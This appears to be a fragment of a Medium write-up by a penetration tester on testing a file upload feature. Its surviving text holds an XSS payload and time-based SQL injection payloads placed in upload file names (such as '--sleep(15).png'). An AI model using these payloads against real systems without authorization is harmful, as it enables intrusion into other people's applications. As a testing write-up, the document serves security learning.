SQL Injection - The File Upload Playground

  1. I found an option to upload a file
File Upload
XSS Payload
Self XSS
XSS Payload
Triggered Error
Sleep Payload
Sleep Payload
Sleep Payload
Sleep Payload
  1. “><img src=x onerror=alert(document.domain)>
  2. --sleep(15).png
  3. --sleep(6*3).png
  4. --sleep(25).png
  5. --sleep(5*7).png
  1. $target_dir = “uploads/” — specifies the directory where the file is going to be placed

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jerry Shah (Jerry)

Jerry Shah (Jerry)

3.1K Followers

|Penetration Tester| |Hack The Box| |Digital Forensics| |Malware Analysis|